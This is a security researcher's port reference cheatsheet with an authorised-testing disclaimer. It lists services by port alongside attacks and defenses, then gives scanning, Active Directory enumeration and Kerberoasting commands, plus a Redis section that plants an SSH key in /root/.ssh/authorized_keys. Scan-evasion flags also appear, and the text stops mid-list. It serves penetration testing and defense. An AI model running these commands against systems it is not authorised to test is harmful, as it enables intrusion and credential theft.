Mohamed Zaam

Disclaimer & Usage Note

This cheatsheet is a personal reference compiled for my own use in security research and professional development. While I strive for 100% technical accuracy and update these entries to reflect the 2026 threat landscape, port usage can vary by environment and service configuration.

Use this information at your own risk. I am not responsible for any misconfigurations, missed detections, or unintended consequences resulting from the use of this data. Always verify findings with secondary tools (like service banners or version fingerprints) before taking action.

Authorized testing only. Unauthorized access to computer systems is illegal.

Common Service Ports (TCP/UDP)

File Transfer & Access

• 20/21 (TCP) - FTP (File Transfer Protocol) - Data/Control
• Attack: Anonymous login, credential sniffing, bounce attacks, cleartext
• Defense: Use SFTP/FTPS, disable anonymous
• Note: Legacy protocol, avoid in production
• 22 (TCP) - SSH (Secure Shell)
• Defense: Key-based auth, fail2ban, non-standard ports, disable root login
• Attack: Brute force, credential stuffing, weak keys
• Modern: Ed25519 keys preferred over RSA
• 69 (UDP) - TFTP (Trivial File Transfer Protocol)
• Attack: No authentication, directory traversal, config file extraction
• 115 (TCP) - SFTP (Simple File Transfer Protocol) - Legacy
• 989/990 (TCP) - FTPS (FTP over SSL) - Data/Control
• 445 (TCP) - SMB (Server Message Block)
• Critical: EternalBlue (MS17-010), WannaCry, ransomware, lateral movement
• Attack: SMB relay, pass-the-hash, null sessions, share enumeration
• 2026 Critical: SMBv1 MUST be disabled - consider it a legacy vulnerability
• 2049 (TCP/UDP) - NFS (Network File System)
• Attack: Improper exports, no_root_squash exploitation, mount enumeration

Web Services & Application Servers

• 80 (TCP) - HTTP
• Attack: XSS, SQLi, CSRF, LFI/RFI, directory traversal, SSRF
• 443 (TCP/UDP) - HTTPS / HTTP/3 (QUIC)
• Defense: TLS 1.3 (minimum 1.2), certificate pinning, HSTS, strong ciphers
• Attack: Certificate issues, app vulnerabilities
• 2026 Update: HTTP/3 runs over QUIC (UDP 443). Firewalls blocking UDP 443 break modern web traffic
• Defense: JA4 fingerprinting (JA3 is obsolete)
• 591 (TCP) - FileMaker (alternate HTTP)
• 593 (TCP) - HTTP RPC Endpoint Mapper
• 8000 (TCP) - Common alternate HTTP
• 8008 (TCP) - HTTP Alternate
• 8080 (TCP) - HTTP Proxy/Alternate (Tomcat default)
• Common: Jenkins, proxy servers, development servers
• 8180 (TCP) - Apache Tomcat
• 8443 (TCP) - HTTPS Alternate (Tomcat SSL)
• 8888 (TCP) - Alternate HTTP (Jupyter Notebook default, Sliver C2)
• 9090 (TCP) - Openfire Admin, Prometheus, various web UIs

Email Protocols

• 25 (TCP) - SMTP (Simple Mail Transfer Protocol)
• Attack: Open relay, spam, email spoofing, user enumeration (VRFY/EXPN)
• Defense: SPF, DKIM, DMARC, TLS enforcement
• 109 (TCP) - POP2 (Legacy)
• 110 (TCP) - POP3 (Post Office Protocol)
• Attack: Credential sniffing (cleartext)
• 143 (TCP) - IMAP (Internet Message Access Protocol)
• Attack: Credential sniffing, enumeration
• 465 (TCP) - SMTPS (SMTP over SSL/TLS - Implicit TLS)
• 2026 Update: IETF reaffirmed port 465 as preferred over 587 (STARTTLS). No longer "legacy"
• 587 (TCP) - SMTP (Mail submission with STARTTLS)
• Note: Both 465 and 587 are valid; 465 preferred for implicit TLS
• 993 (TCP) - IMAPS (IMAP over SSL)
• 995 (TCP) - POP3S (POP3 over SSL)
• 2525 (TCP) - SMTP Alternate (spam-friendly)

Directory & Authentication Services

• 88 (TCP/UDP) - Kerberos
• Attack: Kerberoasting, AS-REP roasting, Golden/Silver tickets, overpass-the-hash
• Tools: Rubeus (Windows), Impacket, Kerbrute (Rust-based, faster)
• 389 (TCP/UDP) - LDAP (Lightweight Directory Access Protocol)
• Attack: LDAP injection, credential harvesting, anonymous bind, enumeration
• Tools: ldapsearch, ldapdomaindump, windapsearch
• 636 (TCP) - LDAPS (LDAP over SSL)
• 3268 (TCP) - Global Catalog (LDAP)
• 3269 (TCP) - Global Catalog (LDAPS)
• 8081 (TCP) - Azure AD Connect Health
• 2026 Addition: Critical for Hybrid AD environments

DNS

• 53 (TCP/UDP) - DNS (Domain Name System)
• Attack: DNS spoofing, cache poisoning, zone transfer (AXFR), tunneling, DDoS amplification, subdomain enumeration
• Defense: DNSSEC, rate limiting, recursion controls, TSIG
• Tools: dig, dnsrecon, fierce, dnsenum
• 853 (TCP) - DNS over TLS (DoT)
• 2026 Addition: Standard in Android, iOS, modern Linux distros
• Defense: Encrypted DNS queries, prevents eavesdropping
• 5353 (UDP) - mDNS (Multicast DNS)
• Attack: Service discovery, information disclosure
• 443 (TCP) - DNS over HTTPS (DoH)
• 2026 Note: Increasingly common for privacy, can bypass traditional DNS controls

Remote Access & Management

• 23 (TCP) - Telnet
• Critical: Cleartext credentials, legacy protocol - NEVER USE
• Attack: Credential sniffing, IoT botnet recruitment
• 2026 Note: Finding this open is instant critical finding
• 512 (TCP) - rexec (Remote Execution)
• Critical: Insecure, deprecated
• 513 (TCP) - rlogin (Remote Login)
• Critical: Insecure, trust-based auth
• 514 (TCP) - rsh (Remote Shell)
• Critical: No encryption, trust-based
• 1080 (TCP) - SOCKS Proxy
• Attack: Open proxy abuse, pivoting, C2 tunneling
• 3389 (TCP/UDP) - RDP (Remote Desktop Protocol)
• Attack: BlueKeep (CVE-2019-0708), credential brute force, MiTM, session hijacking
• Defense: NLA, MFA, VPN-only, restricted user policy, RD Gateway
• 2026 Note: Still primary ransomware vector
• Tools: xfreerdp, rdesktop, Mimikatz
• 5800 (TCP) - VNC over HTTP
• 5900+ (TCP) - VNC (Virtual Network Computing)
• Attack: Weak/no passwords, unencrypted sessions, pixel stealing
• Common: 5900 (display 0), 5901 (display 1), etc.
• 5985 (TCP) - WinRM HTTP (Windows Remote Management)
• Attack: Credential brute force, lateral movement
• Tools: evil-winrm, NetExec
• 5986 (TCP) - WinRM HTTPS

Database Ports

• 1433 (TCP/UDP) - Microsoft SQL Server
• Attack: SQLi, xp_cmdshell exploitation, linked servers, weak SA password
• Tools: sqlmap, msf, NetExec
• 1434 (UDP) - MS SQL Monitor/Browser
• Attack: Version enumeration, instance discovery
• 1521 (TCP) - Oracle Database Listener
• Attack: TNS poisoning, credential attacks, privilege escalation
• 1830 (TCP) - Oracle Enterprise Manager
• 3050 (TCP) - Firebird/InterBase
• 3306 (TCP) - MySQL/MariaDB
• Attack: SQLi, weak root passwords, UDF exploitation, file read/write
• Tools: sqlmap, mysql client
• 5432 (TCP) - PostgreSQL
• Attack: SQLi, credential attacks, command execution via extensions
• 5984 (TCP) - CouchDB
• Attack: Unauthenticated access, arbitrary command execution
• 6379 (TCP) - Redis
• Critical: Often exposed without auth, RCE via modules, data exfil
• Attack: Webshell writing, SSH key injection, master/slave replication
• 2026 Note: Continues to be critical security concern if exposed
• 7474 (TCP) - Neo4j Browser
• 8529 (TCP) - ArangoDB
• 9042 (TCP) - Apache Cassandra
• 9200/9300 (TCP) - Elasticsearch (REST API/Transport)
• Attack: Data exposure, RCE via scripts, unauthenticated access
• 27017/27018 (TCP) - MongoDB (Primary/Shard)
• Attack: NoSQL injection, unauthenticated instances, data exposure
• 28017 (TCP) - MongoDB Web Interface (deprecated)

AI/ML Infrastructure (2026 Addition)

• 19530 (TCP) - Milvus (Vector Database)
• Attack: Data poisoning, unauthenticated API access, prompt injection
• 2026 Critical: AI infrastructure is prime target
• 6333 (TCP) - Qdrant (Vector Database)
• Attack: Vector data exposure, embedding manipulation
• 8000 (TCP) - Various ML Serving APIs (TensorFlow Serving, etc.)

Network & Infrastructure Protocols

Network Management

• 161 (UDP) - SNMP (Simple Network Management Protocol)
• Attack: Community string brute force (public/private), information disclosure, config changes
• Defense: SNMPv3 with encryption, ACLs, disable v1/v2c
• Tools: snmpwalk, onesixtyone, snmp-check
• 162 (UDP) - SNMP Trap
• 179 (TCP) - BGP (Border Gateway Protocol)
• Attack: Route hijacking, prefix manipulation, session hijacking
• 199 (TCP) - SNMP over DTLS

DHCP & Network Services

• 67/68 (UDP) - DHCP Server/Client
• Attack: DHCP starvation, rogue DHCP servers, poisoning, MitM
• Tools: Yersinia, dhcpstarv
• 123 (UDP) - NTP (Network Time Protocol)
• Attack: DDoS amplification (monlist), time manipulation for cert bypass
• Defense: Disable monlist, rate limiting, authentication

Routing & Switching Protocols

• 520 (UDP) - RIP (Routing Information Protocol)
• Attack: Route injection, passive reconnaissance
• 521 (UDP) - RIPng (RIP next generation - IPv6)
• 646 (TCP/UDP) - LDP (Label Distribution Protocol)

VPN Protocols

• 500 (UDP) - IPSec IKE (Internet Key Exchange)
• Attack: IKE aggressive mode cracking, VPN fingerprinting
• 1194 (UDP/TCP) - OpenVPN
• Defense: Certificate-based auth, TLS 1.3
• 2026 Note: UDP preferred for performance
• 1701 (UDP) - L2TP (Layer 2 Tunneling Protocol)
• 1723 (TCP) - PPTP (Point-to-Point Tunneling Protocol)
• Critical: Deprecated, vulnerable (MPPE broken) - use alternatives
• 4500 (UDP) - IPSec NAT-T (NAT Traversal)
• 51820 (UDP) - WireGuard
• 2026 Addition: Industry standard for high-speed VPNs
• Defense: Modern cryptography, minimal attack surface, fast

Network Discovery & Zero-Config

• 5353 (UDP) - mDNS (Multicast DNS)
• Attack: Service discovery, hostname enumeration
• 5355 (UDP) - LLMNR (Link-Local Multicast Name Resolution)
• Attack: Responder poisoning, credential capture
• Tools: Responder, Inveigh
• 137/138/139 (UDP/TCP) - NetBIOS (Name/Datagram/Session)
• Attack: NBT-NS poisoning, null sessions, enumeration
• Tools: Responder, enum4linux, nbtscan

Windows Active Directory Environment

Core AD Ports

• 88 (TCP/UDP) - Kerberos
• Attack: Kerberoasting, AS-REP roasting, Golden/Silver tickets, overpass-the-hash
• 135 (TCP) - MS-RPC Endpoint Mapper
• Attack: Enumeration, relay attacks, DCE/RPC exploitation
• 137-139 (TCP/UDP) - NetBIOS
• Attack: Enumeration, credential capture via poisoning
• 389/636 (TCP) - LDAP/LDAPS
• Attack: BloodHound enumeration, credential harvesting
• 443 (TCP) - Azure AD / Entra ID Connect (Outbound)
• 2026 Addition: Critical for Hybrid AD communication
• 445 (TCP) - SMB
• Attack: Pass-the-hash, SMB relay, EternalBlue, share enumeration
• Tools: NetExec, Impacket, PsExec
• 2026 Critical: Disable SMBv1 completely
• 464 (TCP/UDP) - Kerberos Password Change (kpasswd)
• 593 (TCP) - RPC over HTTP Endpoint Mapper
• 3268/3269 (TCP) - Global Catalog LDAP/LDAPS
• 9389 (TCP) - AD Web Services (PowerShell)

Windows Management

• 135 (TCP) - WMI/DCOM
• Attack: Lateral movement via WMI, remote command execution
• 139 (TCP) - NetBIOS Session Service
• 445 (TCP) - SMB/CIFS
• 5985/5986 (TCP) - WinRM HTTP/HTTPS
• Attack: PowerShell remoting, lateral movement
• 47001 (TCP) - WinRM (alternative)

AD Attack Surface Summary

• Responder targets: LLMNR (5355), NBT-NS (137), mDNS (5353)
• Relay targets: SMB (445), HTTP (80), LDAP (389)
• Kerberos attacks: Port 88
• Enumeration: 389, 445, 135, 139

Application & Web Framework Ports

Java Application Servers

• 1099 (TCP) - Java RMI Registry / JMX
• Attack: Deserialization, RCE, and Log4Shell (JNDI) callback.
• 1389 (TCP) - LDAP (Log4j/JNDI)
• Critical: The primary port used for Log4Shell (CVE-2021-44228) malicious callbacks.
• Defense: Restrict outbound traffic; monitor for JNDI strings in request logs.
• 4444 (TCP) - JBoss/WildFly default
• 7001/7002 (TCP) - WebLogic (HTTP/HTTPS)
• Attack: Deserialization (CVE-2020-14882), RCE
• 8009 (TCP) - Apache JServ Protocol (AJP)
• Attack: Ghostcat (CVE-2020-1938), arbitrary file read
• 8080 (TCP) - Tomcat Manager
• Attack: Weak credentials, WAR upload for RCE
• 8180 (TCP) - Tomcat alternate
• 9080/9443 (TCP) - WebSphere HTTP/HTTPS
• 16200 (TCP) - Oracle WebLogic

CI/CD & DevOps Tools

• 4040 (TCP) - Apache Spark UI
• 8080 (TCP) - Jenkins
• Attack: Unauthenticated access, Groovy script console RCE, credential theft
• 8081 (TCP) - Nexus Repository Manager
• 8088 (TCP) - Hadoop YARN ResourceManager
• 8090 (TCP) - Atlassian Confluence
• Attack: OGNL injection, RCE vulnerabilities
• 9000 (TCP) - SonarQube
• Attack: Default credentials (admin/admin)
• 50000 (TCP) - Jenkins JNLP agent
• 50070 (TCP) - Hadoop NameNode

Version Control

• 3690 (TCP) - Subversion (SVN)
• Attack: .svn folder exposure, source code disclosure
• 9418 (TCP) - Git Protocol
• Attack: Unauthenticated clone, .git folder exposure

Content Management Systems

• 2301/2302 (TCP) - Compaq Insight Manager
• 4848 (TCP) - GlassFish Admin Console
• 8000 (TCP) - Django development server
• 8161 (TCP) - Apache ActiveMQ Admin Console
• 10000 (TCP) - Webmin
• Attack: RCE vulnerabilities, weak passwords
• 20000 (TCP) - Usermin

Monitoring, Logging & Analytics

Log Management

• 514 (UDP/TCP) - Syslog
• Attack: Log injection, information disclosure
• 601 (TCP) - Syslog over TLS
• 1514 (TCP) - Wazuh agent communication
• 6514 (TCP) - Syslog over TLS (RFC 5425)

Monitoring & Metrics

• 2003/2004 (TCP) - Graphite (Carbon plaintext/pickle)
• 3000 (TCP) - Grafana
• Attack: Default credentials (admin/admin), SQLi
• 4242 (TCP) - OpenTSDB
• 5601 (TCP) - Kibana
• Attack: Exposed dashboards, prototype pollution, RCE
• 8086 (TCP) - InfluxDB
• 8125 (UDP) - StatsD
• 9090 (TCP) - Prometheus
• Attack: Unauthenticated metrics exposure, sensitive data leaks
• 9093 (TCP) - Prometheus Alertmanager
• 9100 (TCP) - Prometheus Node Exporter

APM & Tracing

• 8126 (TCP) - Datadog APM
• 9411 (TCP) - Zipkin
• 14268 (TCP) - Jaeger HTTP
• 16686 (TCP) - Jaeger UI

Messaging & Queue Systems

Message Brokers

• 1883 (TCP) - MQTT (Message Queuing Telemetry Transport)
• Attack: Unauthenticated access, subscription to all topics (#)
• Common: IoT devices, weak authentication
• 4369 (TCP) - Erlang Port Mapper (RabbitMQ)
• 5222 (TCP) - XMPP Client Connection
• 5269 (TCP) - XMPP Server Connection
• 5672 (TCP) - AMQP (RabbitMQ)
• Attack: Default credentials (guest/guest), management console access
• 8883 (TCP) - MQTT over SSL
• 9092 (TCP) - Apache Kafka
• Attack: Unauthenticated access, topic enumeration
• 15672 (TCP) - RabbitMQ Management Console
• 61613/61614 (TCP) - STOMP (plaintext/SSL)
• 61616 (TCP) - Apache ActiveMQ OpenWire
• Attack: Deserialization RCE

Collaboration

• 5060/5061 (TCP/UDP) - SIP (Session Initiation Protocol) plain/TLS
• Attack: Enumeration, toll fraud, eavesdropping
• 5222 (TCP) - Jabber/XMPP
• 8065 (TCP) - Mattermost

Container & Orchestration

Docker

• 2375 (TCP) - Docker API (unencrypted)
• Critical: Full container control, host escape potential
• Attack: Container creation, volume mounting, RCE on host
• 2376 (TCP) - Docker API (TLS)
• 2377 (TCP) - Docker Swarm
• 4243 (TCP) - Docker API alternate
• 5000 (TCP) - Docker Registry
• Attack: Image enumeration, malicious image push

Kubernetes

• 2379/2380 (TCP) - etcd (client/peer)
• Critical: Cluster state database, secrets exposure
• 6443 (TCP) - Kubernetes API Server
• Attack: Unauthenticated access, RBAC bypass, privilege escalation
• 8001 (TCP) - Kubernetes API Proxy
• 10250 (TCP) - Kubelet API
• Attack: Unauthenticated RCE, pod enumeration
• 10255 (TCP) - Kubelet Read-Only
• 2026 Note: Disabled by default in K8s v1.25+. Finding it open = instant critical
• 10256 (TCP) - Kube-proxy
• 10257 (TCP) - Kube Controller Manager (Secure)
• 2026 Addition: Secure endpoint
• 10259 (TCP) - Kube Scheduler (Secure)
• 2026 Addition: Secure endpoint

Container Registries

• 5000 (TCP) - Docker Registry
• 5001 (TCP) - Docker Registry (alternate)

Cloud Service Ports

AWS

• 169.254.169.254 - EC2 Instance Metadata Service (IMDS)
• 2026 Critical Update: IMDSv2 is standard. Simple curl often fails without token exchange
• Attack: SSRF attacks now require bypassing token headers (X-aws-ec2-metadata-token)

Azure

• 1433 (TCP) - Azure SQL
• 3306 (TCP) - Azure MySQL
• 5432 (TCP) - Azure PostgreSQL

Cloud Management

• 8140 (TCP) - Puppet Master
• 8443 (TCP) - vCenter/vSphere
• 9000 (TCP) - Cloud9 IDE
• 10250 (TCP) - Kubelet (cloud-hosted K8s)

Industrial Control Systems (ICS/SCADA)

SCADA Protocols

• 102 (TCP) - Siemens S7 (ISO-TSAP)
• Attack: PLC programming, start/stop commands
• 502 (TCP) - Modbus
• Attack: No authentication, read/write registers, device control
• 2404 (TCP) - IEC 60870-5-104
• 20000 (TCP) - DNP3 (Distributed Network Protocol)
• 44818 (TCP) - Ethernet/IP (Allen-Bradley)
• 47808 (TCP/UDP) - BACnet (Building Automation)
• Attack: HVAC control, sensor manipulation

Industrial Ethernet

• 4840 (TCP) - OPC UA (OPC Unified Architecture)
• Attack: Authentication bypass, information disclosure
• 34962-34964 (TCP) - Profinet
• 34980 (TCP) - Profinet RT

Backup & Storage

Backup Services

• 10000 (TCP) - Network Data Management Protocol (NDMP)
• 10080 (TCP) - Amanda Backup
• 6070/6071 (TCP) - Veeam Backup
• 9392 (TCP) - Bacula Director
• 9393 (TCP) - Bacula File Daemon

Network Storage

• 111 (TCP/UDP) - RPCbind/Portmapper
• Attack: NFS enumeration, service discovery
• 2049 (TCP/UDP) - NFS
• 3260 (TCP) - iSCSI
• Attack: Unauthenticated access, data exposure

Proxy, Load Balancer & CDN

Proxy Services

• 808 (TCP) - Proxy alternate
• 1080 (TCP) - SOCKS Proxy
• 3128 (TCP) - Squid Proxy
• Attack: Open proxy abuse, cache poisoning
• 8080 (TCP) - HTTP Proxy
• 8118 (TCP) - Privoxy
• 9050/9051 (TCP) - Tor SOCKS/Control

Load Balancers

• 1936 (TCP) - HAProxy Stats
• 8404 (TCP) - HAProxy Stats (alternate)

VoIP & Telephony

SIP & VoIP

• 5060 (TCP/UDP) - SIP (plaintext)
• Attack: User enumeration (OPTIONS, REGISTER), call interception
• 5061 (TCP) - SIP over TLS
• 2000/2001 (TCP) - Cisco SCCP (Skinny)
• 1719/1720 (TCP/UDP) - H.323 (RAS/Call Signaling)

Media Streaming

• 554 (TCP/UDP) - RTSP (Real Time Streaming Protocol)
• 1935 (TCP) - RTMP (Real-Time Messaging Protocol)
• 5004/5005 (UDP) - RTP/RTCP
• 8554 (TCP) - RTSP Alternate

Certificate & PKI Services

Certificate Management

• 80 (TCP) - ACME HTTP-01 Challenge (Let's Encrypt)
• 443 (TCP) - ACME TLS-ALPN-01 Challenge
• 2560 (TCP) - OCSP (Online Certificate Status Protocol)
• 8080 (TCP) - Certificate Enrollment Web Service
• 8443 (TCP) - EJBCA Admin Interface

Gaming & Entertainment

• 25565 (TCP) - Minecraft
• 27015 (TCP/UDP) - Steam/Source Engine Games
• 27017 (TCP) - MongoDB (also a gaming port collision)
• 3074 (TCP/UDP) - Xbox Live
• 3478-3479 (TCP/UDP) - PlayStation Network
• 6112 (TCP/UDP) - Blizzard Games
• 7777 (TCP/UDP) - Unreal Tournament

Malware & C2 Common Ports (2026 Update)

Known C2 Ports

• 443 (TCP/UDP) - HTTPS/HTTP/3 (Most modern C2 for blending)
• 2026 Update: C2 over DoH (DNS over HTTPS) increasingly common
• 4444 (TCP) - Metasploit default listener
• Common: Reverse shells, bind shells
• 4445 (TCP) - Metasploit alternate
• 5555 (TCP) - Android Debug Bridge (ADB) - also malware favorite
• 6666/6667 (TCP) - IRC (historic malware C2)
• 8080/8443 (TCP) - HTTPS C2 (blends with legitimate traffic)
• 8888 (TCP) - Sliver C2 default
• 2026 Addition: Modern C2 framework
• 31337 (TCP) - Back Orifice, "elite" port
• 50051 (TCP) - gRPC (Havoc/Mythic C2)
• 2026 Addition: Modern C2 frameworks use gRPC

Modern C2 Frameworks (2026)

• Sliver / Havoc / Mythic: Largely replaced/supplemented Cobalt Strike
• Ports: 8888, 50051 (gRPC), or standard 443 (via redirectors)
• Trend: C2 traffic over legitimate cloud services (AWS, Azure, GCP APIs)

Ransomware Communication

• 443 (TCP/UDP) - HTTPS/HTTP/3 (most modern ransomware)
• 8080/8443 (TCP) - Alternate HTTPS
• 9001-9050 (TCP) - Tor network

Pentesting & Red Team Tools (2026 Update)

Metasploit Framework

• 4444 (TCP) - Default meterpreter listener
• 4445 (TCP) - Alternate listener
• 55553/55554 (TCP) - Metasploit web service

Command & Control Frameworks

• 80/443 (TCP/UDP) - HTTP/HTTPS/HTTP/3 beacons
• 50050 (TCP) - Cobalt Strike team server (default)
• 53 (UDP) - DNS tunneling (dnscat2, iodine)
• 853 (TCP) - DNS over TLS (C2 exfiltration)

Pivoting & Tunneling

• 1080 (TCP) - SOCKS proxy (for pivoting)
• 3128 (TCP) - HTTP proxy
• 8080 (TCP) - HTTP proxy alternate

Printer & Multifunction Devices

• 515 (TCP) - LPD (Line Printer Daemon)
• 631 (TCP/UDP) - IPP (Internet Printing Protocol) / CUPS
• Attack: Information disclosure, arbitrary code execution
• 9100 (TCP) - Raw printing (JetDirect)
• Attack: Print job manipulation, memory dumps

Miscellaneous Important Ports

Development & Testing

• 3000 (TCP) - Node.js/React development server, Grafana
• 4200 (TCP) - Angular development server
• 5000 (TCP) - Flask/Python dev server, Docker Registry
• 8000 (TCP) - Django/Python dev server
• 8081 (TCP) - Various dev servers

Remote Support

• 5938 (TCP) - TeamViewer
• 5500 (TCP) - VNC alternate

Game Servers & P2P

• 6881-6889 (TCP) - BitTorrent
• 6969 (TCP/UDP) - BitTorrent tracker

Finger & Information Services

• 43 (TCP) - WHOIS
• 70 (TCP) - Gopher (legacy)
• 79 (TCP) - Finger Protocol
• Attack: User enumeration
• 113 (TCP) - Ident/Auth Service

Port Ranges & Dynamic Ports

Well-Known Ranges

• 0-1023 - Well-known/system ports (require root/admin)
• 1024-49151 - Registered ports (IANA assigned)
• 49152-65535 - Dynamic/ephemeral ports

Common Ephemeral Ranges by OS

• Linux: 32768-60999
• Windows: 49152-65535 (Vista+), 1025-5000 (older)
• FreeBSD: 10000-65535

High-Priority Security Monitoring (2026)

Critical Ports to Monitor (Defense)

1. 3389 (RDP) - Brute force, BlueKeep, lateral movement, ransomware
2. 445 (SMB) - Ransomware, EternalBlue, lateral movement
3. 22 (SSH) - Brute force, unauthorized access
4. 1433/3306/5432 - Database attacks, exfiltration
5. 53 (DNS) - Tunneling, C2, exfiltration, DoH evasion
6. 443 (TCP/UDP) - Web attacks, C2 beaconing, HTTP/3 traffic
7. 88 (Kerberos) - Kerberoasting, Golden tickets
8. 389 (LDAP) - Enumeration, credential harvesting
9. 5985/5986 (WinRM) - Lateral movement
10. 6379 (Redis) - Unauthenticated RCE
11. 853 (DoT) - C2 exfiltration channel
12. 6333/19530 - AI/ML infrastructure attacks

Ports That Should NEVER Be Externally Exposed (2026)

• 23 - Telnet (instant critical)
• 135, 137-139, 445 - Windows file sharing (SMBv1 disabled!)
• 1433, 3306, 5432, 27017 - Databases
• 2049 - NFS
• 2375 - Docker API (unencrypted)
• 3389 - RDP (use VPN or RD Gateway)
• 5900+ - VNC
• 5985/5986 - WinRM
• 6379 - Redis
• 8080, 8443, 8888 - Admin interfaces
• 9200 - Elasticsearch
• 10250 - Kubelet
• 10255 - Kubelet Read-Only (disabled by default, critical if found)

Attack Surface Checklists (2026)

External Perimeter Scan Priorities

1. Web services: 80, 443 (TCP/UDP for HTTP/3), 8080, 8443
2. Remote access: 22, 3389, 5900
3. Email: 25, 465, 587
4. DNS: 53, 853 (DoT)
5. VPN: 500, 1194, 51820 (WireGuard)
6. Databases: 1433, 3306, 5432, 27017, 6379
7. Exposed admin: 8080, 8443, 10000
8. AI/ML: 6333, 19530
9. Container APIs: 2375, 6443, 10250

Internal Network Enumeration

1. AD services: 88, 389, 445, 3268
2. SMB shares: 445, 139 (verify SMBv1 disabled)
3. Windows management: 135, 5985, 5986
4. Databases: All DB ports
5. Web applications: 80, 443, 8080, 8000-8888
6. Network devices: 161, 162
7. Printers: 515, 631, 9100
8. Kerberos: 88 (Kerberoasting, AS-REP roasting)

Cloud Environment Assessment (2026)

1. Metadata services: 169.254.169.254 (IMDSv2 token required)
2. Container APIs: 2375, 2376, 4243
3. Kubernetes: 6443, 10250, 10257, 10259, 2379
4. Management consoles: 8080, 8443, 9090
5. Exposed storage: 2049, 445, 3260
6. Vector databases: 6333, 19530

Quick Reference Commands (2026 Updated)

# ============================================
# Comprehensive port scan (HTTP/3 aware)
# ============================================
nmap -sS -sV -sC -p- --min-rate 1000 -oA full_scan <target>

# UDP scan for HTTP/3, WireGuard, DNS
nmap -sU -p 53,443,853,51820 --open <target>

# Service detection with NSE scripts
nmap -sV --script=default,vuln -p- <target>

# Aggressive scan (OS, version, scripts, traceroute)
nmap -A -T4 -p- <target>

# Check for HTTP/3 support
nmap -sU -p 443 --script http-methods <target>

# ============================================
# SMB enumeration (NetExec - CrackMapExec replacement)
# ============================================
nxc smb <target> -u '' -p '' --shares
nxc smb <target> -u user -p pass --users
nxc smb <target> -u user -p pass --sam
nxc smb <target> -u user -p pass -M spider_plus

# Alternative: enum4linux
enum4linux -a <target>

# Check for SMBv1 (should be disabled)
nmap --script smb-protocols -p445 <target>

# ============================================
# Active Directory enumeration
# ============================================
# NetExec (modern)
nxc smb <target> -u user -p pass --users
nxc ldap <DC-IP> -u user -p pass --users

# BloodHound
bloodhound-python -u user -p pass -d domain.local -ns <DC-IP> -c All

# Kerberoasting (Impacket)
GetUserSPNs.py -request -dc-ip <DC-IP> domain.local/user:pass

# Kerberoasting (Rubeus - Windows)
Rubeus.exe kerberoast /outfile:hashes.txt

# AS-REP Roasting
GetNPUsers.py domain.local/ -dc-ip <DC-IP> -usersfile users.txt -format hashcat

# ============================================
# Check for anonymous access
# ============================================
rpcclient -U "" -N <target>
smbclient -L //<target> -N
ldapsearch -x -h <target> -s base

# ============================================
# Web vulnerability scanning
# ============================================
nikto -h http://<target>
whatweb <target>

# Check for HTTP/3
curl --http3 https://<target>

# ============================================
# DNS enumeration (including DoT)
# ============================================
# Zone transfer
dig axfr @<DNS-server> domain.com

# Subdomain enumeration
fierce --domain domain.com
dnsrecon -d domain.com -t axfr

# DNS over TLS test (port 853)
kdig -d @<DNS-server> +tls domain.com

# ============================================
# SNMP enumeration
# ============================================
snmpwalk -v2c -c public <target>
onesixtyone -c community.txt <target>
nmap --script snmp-brute,snmp-info -p161 <target>

# ============================================
# Check listening ports (local system)
# ============================================
# Linux
netstat -tuln
ss -tuln
lsof -i -P -n

# Windows
netstat -ano
Get-NetTCPConnection | Select LocalAddress,LocalPort,State

# ============================================
# Banner grabbing
# ============================================
nc -v <target> <port>
telnet <target> <port>

# ============================================
# Test specific common ports
# ============================================
nc -zv <target> 22 80 443 445 3389 8080

# ============================================
# Responder (LLMNR/NBT-NS poisoning)
# ============================================
responder -I eth0 -wrf

# ============================================
# Check for MS17-010 (EternalBlue)
# ============================================
nmap --script smb-vuln-ms17-010 -p445 <target>

# ============================================
# WinRM enumeration
# ============================================
nxc winrm <target> -u user -p pass
evil-winrm -i <target> -u user -p pass

# ============================================
# Cloud Metadata (AWS IMDSv2 - 2026 Standard)
# ============================================
# Retrieve token
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)

# Request metadata with token
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/

# Check for IMDSv1 (should fail if v2 enforced)
curl http://169.254.169.254/latest/meta-data/

# ============================================
# Kubernetes enumeration
# ============================================
# Check Kubelet (10250)
curl -sk https://<target>:10250/pods

# Check for read-only Kubelet (10255 - critical if open)
curl http://<target>:10255/pods

# Kubernetes API
kubectl --insecure-skip-tls-verify -s https://<target>:6443 get pods

# ============================================
# Docker API enumeration
# ============================================
# Unauthenticated Docker API (2375)
curl http://<target>:2375/version
docker -H tcp://<target>:2375 ps

# ============================================
# Redis exploitation
# ============================================
# Check if authentication required
redis-cli -h <target> INFO

# Write SSH key (if writable)
redis-cli -h <target> config set dir /root/.ssh/
redis-cli -h <target> config set dbfilename authorized_keys
echo -e "\n\n$(cat id_rsa.pub)\n\n" | redis-cli -h <target> -x set key

# ============================================
# Vector Database enumeration (2026)
# ============================================
# Milvus (19530)
curl http://<target>:19530/api/v1/health

# Qdrant (6333)
curl http://<target>:6333/collections

# ============================================
# WireGuard detection (51820)
# ============================================
nmap -sU -p 51820 <target>

Port Scanning Defense (2026)

Detection Strategies

• IDS/IPS signatures: SYN floods, rapid port sequences, null scans
• Rate limiting: Slow/distributed scans harder to detect
• Honeypots: Deploy on unused ports to catch scanning
• SIEM correlation: Multiple failed connections from single source
• AI-based detection: Behavioral analysis of scan patterns
• Tools: Snort, Suricata, PortSentry, OSSEC, Wazuh

Evasion Techniques (Red Team)

• Timing: Slow scans (-T0, -T1), random delays
• Fragmentation: -f flag, --mtu
• Decoys: -D (spoof source IPs)
• Source port manipulation: --source-port 53 or 80
• Idle scan: -sI (zombie host)
• HTTP/3 scanning: Bypass traditional TCP-focused detection

Hardening Best Practices (2026)

1. Default deny firewall policy - block UDP 443 selectively, not blanket
2. Disable unnecessary services - especially SMBv1 (critical!)
3. Non-standard ports for admin services (not primary defense)
4. Port knocking for sensitive services
5. VPN/Zero Trust for all administrative access
6. Network segmentation (VLANs, DMZ, micro-segmentation)
7. Regular port audits with authorized scanning
8. Host-based firewalls (iptables, nftables, Windows Firewall)
9. Fail2ban/Crowdsec for brute force protection
10. Certificate-based authentication over passwords
11. IMDSv2 enforcement for cloud instances
12. Kubernetes RBAC and PSP/PSA enforcement
13. DoT/DoH monitoring for C2 detection

Protocol Quick Reference (2026 Updated)

Incident Response Port Indicators (2026)

Known Bad Actor Patterns

• Rapid scanning: Hundreds of ports in seconds
